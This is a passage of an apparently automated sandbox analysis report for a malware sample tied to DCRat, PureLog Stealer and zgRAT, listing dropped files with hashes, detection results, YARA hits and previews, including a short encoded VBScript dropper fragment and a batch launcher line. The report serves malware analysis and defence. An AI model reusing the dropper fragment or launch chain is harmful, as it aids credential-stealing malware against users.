                                                                                                              based.exeGet hashmaliciousDCRat, PureLog Stealer, Xmrig, zgRATBrowse
                                                                                                                4Awb1u1GcJ.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse

Process: C:\Users\user\Desktop\file.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 76
Entropy (8bit): 4.66715165176704
Encrypted: false
SSDEEP: 3:AI18oYydpeKHAXPlmXQlOKfb49kq:trf6KglmXQ4b9kq
MD5: F64211E9D1EC38EDE33666033382D99C
SHA1: B602450C1B9D00043F20DCB60537E8706FCAD872
SHA-256: 6E4D045D43E97C5FCA3DDC26016DB1F1C73B334C6FE4CEE92B65974C745A9CCA
SHA-512: 1E80F74C7A6582AC8187BB22DD70FA38E8D18840D4A45D27098C6EB517228B836218211418B147FC0060CC7029AE12D6ABD0D6348B731169B93C9062876C677D
Malicious: false
Preview: %QtUm%%JmqJp%..%WxL%"C:\MsContainer/chainportruntimeCrtMonitor.exe"%fmNwnup%

Process: C:\Users\user\Desktop\file.exe
File Type: data
Category: dropped
Size (bytes): 212
Entropy (8bit): 5.775012186923779
Encrypted: false
SSDEEP: 6:GUwqK+NkLzWbH1xdyrFnBaORbM5nCkDaj/4JqWLz9:GlMCzWL1xdyhBaORbQCwSQJpLp
MD5: CCC3DE297113F78D2B92B26BF192FCE3
SHA1: 417DCFBA717CE68EBD96B71A2EDAC15F93E91AAE
SHA-256: 2E776534DAB440E19BDA0F46B1BD2A21F2F9C2DEE1C225632F87907939516D37
SHA-512: F4C1AEFDDFCC7A9EB3FE5F333AD287FC0F4353C475EAD34890FFC1609605CE1544BBE0EE4A7192B856AF7540A5D1FCDFE9649856C3A04150C6EDC709B1BB6459
Malicious: true
Antivirus:
• Antivirus: Avira, Detection: 100%
Preview: #@~^uwAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.U^DbwO UV+n2vFq!ZT*@#@&U+DP.ktU4+^V~',Z.nmY+}8L.mYvE.?1DbwORj4.VsJ*@#@&q/4j4+Vs "EUPr/=z\kZKxYmk.nDJz!CVtjP`/r8$;W0*Hp++q.~R8lOEBPT~,Wl^/nYToAAA==^#~@.

Process: C:\Users\user\Desktop\file.exe
File Type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category: dropped
Size (bytes): 2009600
Entropy (8bit): 7.5678452559926175
Encrypted: false
SSDEEP: 49152:Z1ijXQywiXW604Jjh42gv9Gk2AWDpL5ml:Z1IZXWCJjhZgHW1N4
MD5: 38514F88AFF517EA6BE4724D24B28FE2
SHA1: 0D9CE3815F04C401561339B056C7AB2BA907E16C
SHA-256: 92C34270DF9842C931AB9E4AF87A0CBDD1F3B12E70482D474C3A9D0029F09ADD
SHA-512: C7516E29A99FC053D07DA626BDCE8AB37917267DE2911685DEBD3E0764819B3A387626D98413EC62808789E28E15739E0B533A9C8AB765215506BDF6AD5EF707
Malicious: true
Yara Hits:
• Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\MsContainer\chainportruntimeCrtMonitor.exe, Author: Joe Security
• Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\MsContainer\chainportruntimeCrtMonitor.exe, Author: Joe Security
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 58%

Process: C:\Windows\System32\svchost.exe
File Type: data
Category: dropped
Size (bytes): 1310720
Entropy (8bit): 1.3073444247601114
Encrypted: false
SSDEEP: 3072:5JCnRjDxImmaooCEYhlOe2Pp4mH45l6MFXDaFXpVv1L0Inc4lfEnogVsiJKrvrS:KooCEYhgYEL0In
MD5: A6BBC3ECCF86B784614349F032E455A8
SHA1: EF03AB930DB0882B44E8751D31DFD112F2C26810
SHA-256: A81ECD6D7FB124FA08D91ABEF5E71FF3C71E682047FA2EE6FD7B4D1DB7E60666
SHA-512: 0793CEACB6274027F488DBA8187C2A0C9DD9DFF6EC9CA32AC9D200481A7300A83C781A0EE4514FF6C4E68CA5AF41272139A95C2A1A6307635A9E0AFDA8313898
Malicious: false

Process: C:\Windows\System32\svchost.exe
File Type: Extensible storage engine DataBase, version 0x620, checksum 0xac1cf448, page size 16384, DirtyShutdown, Windows version 10.0
Category: dropped
Size (bytes): 1310720
Entropy (8bit): 0.42210140213061104
Encrypted: false
SSDEEP: 1536:BSB2ESB2SSjlK/dvmdMrSU0OrsJzvdYkr3g16T2UPkLk+kTX/Iw4KKCzAkUk1kI6:Baza/vMUM2Uvz7DO
MD5: 9D5FED7ECDBAC6662766D68B46024E36
SHA1: 5ABFA6076B45E8991C7EEDF350398CD53708030D
SHA-256: 6366BE89F0E1CFA8C1398934C8A898700A7C67FE4A7FD045158645ED3230DD5D
SHA-512: 547D171CE40AFCB6DFBB186C3394D09247348A975C0ABD597C25595262C3D4EE50CABA237FF8254F6C162DC91E09F7C831FAF6D510B6AA59A7ABC95F0809896B
Malicious: false

Process: C:\Windows\System32\svchost.exe
File Type: data
Category: dropped
Size (bytes): 16384
Entropy (8bit): 0.07576490241172268
Encrypted: false
SSDEEP: 3:SmltEYeA54KPhvCjn13a/25+p0XlAllcVO/lnlZMxZNQl:SmUzm4KPha53q25V1AOewk
MD5: 5D81E952F3ED47057783EF34A59FE71E
SHA1: DA89514A6A365BB64725D8A9884BC954F64C606B
SHA-256: 1C962C52AFC907BBD8FF7952580AEF17A4008CC43380EC2B97153AA9C2B9AF78
SHA-512: 1BE8CBDF6A3E1D7C5EB373889577CA12F89216DA3C5AAE487053A6F3F1547DCA6008E278A6F235AB74FEDCCC8B0647A7519B1E3C53D863B284CA193020420598
Malicious: false

Process: C:\MsContainer\chainportruntimeCrtMonitor.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 1396
Entropy (8bit): 5.350961817021757
Encrypted: false
SSDEEP: 24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNrJE4qtE4KlOU4mZsXE4Npv:MxHKQwYHKGSI6oPtHTHhAHKKkrJHmHKu
MD5: EBB3E33FCCEC5303477CB59FA0916A28
SHA1: BBF597668E3DB4721CA7B1E1FE3BA66E4D89CD89
SHA-256: DF0C7154CD75ADDA09758C06F758D47F20921F0EB302310849175D3A7346561F
SHA-512: 663994B1F78D05972276CD30A28FE61B33902D71BF1DFE4A58EA8EEE753FBDE393213B5BA0C608B9064932F0360621AF4B4190976BE8C00824A6EA0D76334571
Malicious: false
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutr

Process: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
File Type: CSV text
Category: dropped
Size (bytes): 847
Entropy (8bit): 5.354334472896228
Encrypted: false
SSDEEP: 24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
MD5: 9F9FA9EFE67E9BBD165432FA39813EEA
SHA1: 6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
SHA-256: 4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
SHA-512: F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
Malicious: false
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 64
Entropy (8bit): 1.1510207563435464
Encrypted: false
SSDEEP: 3:Nlllullkv/tz:NllU+v/
MD5: 6442F277E58B3984BA5EEE0C15C0C6AD
SHA1: 5343ADC2E7F102EC8FB6A101508730898CB14F57
SHA-256: 36B765624FCA82C57E4C5D3706FBD81B5419F18FC3DD7B77CD185E6E3483382D
SHA-512: F9E62F510D5FB788F40EBA13287C282444607D2E0033D2233BC6C39CA3E1F5903B65A07F85FA0942BEDDCE2458861073772ACA06F291FA68F23C765B0CA5CA17
Malicious: false

Process: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
File Type: SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
Category: dropped
Size (bytes): 20480
Entropy (8bit): 0.5712781801655107
Encrypted: false
SSDEEP: 12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
MD5: 05A60B4620923FD5D53B9204391452AF
SHA1: DC12F90925033F25C70A720E01D5F8666D0B46E4
SHA-256: 6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
SHA-512: 068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
Malicious: false
                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):106496
                                                                                                                  Entropy (8bit):1.1358696453229276
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                  MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                  SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                  SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                  SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                  Malicious:false
                                                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                  Process:C:\MsContainer\chainportruntimeCrtMonitor.exe
                                                                                                                  File Type:ASCII text, with very long lines (701), with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):701
                                                                                                                  Entropy (8bit):5.89743604568768
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12:Ma1lhokNFvEE+AA+RQjfzA7qcE0j8RQYXHCoXAHYsuWgsHM0FGB3CY2w7M9ulLm:rEEjdQjf4qSMNZ+5uWg6rWuw7dlLm
                                                                                                                  MD5:71B8474E859D543BB8489DA42E270634
                                                                                                                  SHA1:2230E8E932C74851E4EE104676B112BDAA4E1E34
                                                                                                                  SHA-256:633D5393926EA8661DA3C6910864198C340B1218036386458AB855DEF6944810
                                                                                                                  SHA-512:576C885A967ADB0A9DEB72F89B6CF5E2070D90676704C3EB7E57B1FFA376A7CFF3CA114B7C0B4E9BD960866B4803303CD3DDD35C24A1573616EBFC259E03A37C
                                                                                                                  Malicious:false
                                                                                                                  Preview:k07HEtA7hLe48MUYRIZisaW1FBf96OoPAI0OceA6XfhfKHuqJUKHO88KdFBDNBASgP40VF6xHcKN21q8QyzlDhBBJpuWc7sWeO85N4VEYX9wyvSmYDwZLZO9O3qpUjUKtxso2vvWdvNqhOMYXH7YKTLF98rTNptzCzCADntnSa6aLic9qSRMl69ammo4EbIxBXosMMVuYUGtWu3bgrn4XhNGzlXa8zi0RIZy3twd7hyRzPD1sNXWxOaeKi2ly4viwQcOVFiw4J7zs6RjhfrvcLCDr4nU1LpDwQeixzgnokcoRkwORTDSM9FkNYgacN5te3Dbbsvs9EG1tYwHIZDiIW0xK4VZTFKbpsJXhUwjhVTH2O0zmZRDJXlIDQQgXWY34pMAPZjymeAwDs46Egx3yHRRHBTRDQLK6ZNNBzjMzdapWyEUVUc1jfFwX43NFSvWS00oeq4O6kEUqm5T685txUlbTb0H6WHhsEXg7a0pZO58auGu9jQGWBi7OZUD0xRjchmlPZWgIQTiZmAiUFHXFBKqfZRiFwyl6Vg3IefkNu7Gs9hlYwsuq4dbX6FzHxaWbrmEGHa0jhJVDD7f1pJSDE5B1EgLYqcZTlpAXdeRW2KIvIYT8k7boISXwkMCkPb3FtCbY7IXL16L3xQtpMMysBvLTRNxQcqHaRDBG75BbkQwLHe9TdWXCnLD80HGt
                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
                                                                                                                  File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):98304
                                                                                                                  Entropy (8bit):0.08235737944063153
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                  MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                  SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                  SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                  SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                  Malicious:false
                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):114688
                                                                                                                  Entropy (8bit):0.9746603542602881
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                  Malicious:false
                                                                                                                  Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):28672
                                                                                                                  Entropy (8bit):2.5793180405395284
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                  MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                  SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                  SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                  SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                  Malicious:false
                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):40960
                                                                                                                  Entropy (8bit):0.8553638852307782
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                  Malicious:false
                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):49152
                                                                                                                  Entropy (8bit):0.8180424350137764
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                  MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                  SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                  SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                  SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                  Malicious:false
                                                                                                                  Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                  Process:C:\MsContainer\chainportruntimeCrtMonitor.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):25
                                                                                                                  Entropy (8bit):4.163856189774724
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:sodqrBjQVKBn:sAqrVtBn
                                                                                                                  MD5:DD6EE51E1E770D91820C6DBBEBAFCD0A
                                                                                                                  SHA1:BE7AC8CEB2710CF816DA10262A66DAF7AC59CEDD
                                                                                                                  SHA-256:A167A41FDECD16E44CCA605D9DB9E5C5043AE0ACA0FBF274905DD86CC38BE209
                                                                                                                  SHA-512:3C367E9CD482F88FFEDDF4CD8E7AAD503B5E63D4A590B09A1817EA79944FC2538C9CDE6170DE6CDCA1DEC0ED75F125D4ED6A3F8974625A1C86A58E1D5D149C68
                                                                                                                  Malicious:false
                                                                                                                  Preview:RLWIu9AMxOdxFTEwF9DPzzRGd
                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):40960
                                                                                                                  Entropy (8bit):0.8553638852307782
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                  Malicious:false
                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):106496
                                                                                                                  Entropy (8bit):1.1358696453229276
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                  MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                  SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                  SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                  SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                  Malicious:false
                                                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):20480
                                                                                                                  Entropy (8bit):0.5707520969659783
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                  MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                  SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                  SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                  SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                  Malicious:false
                                                                                                                  Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
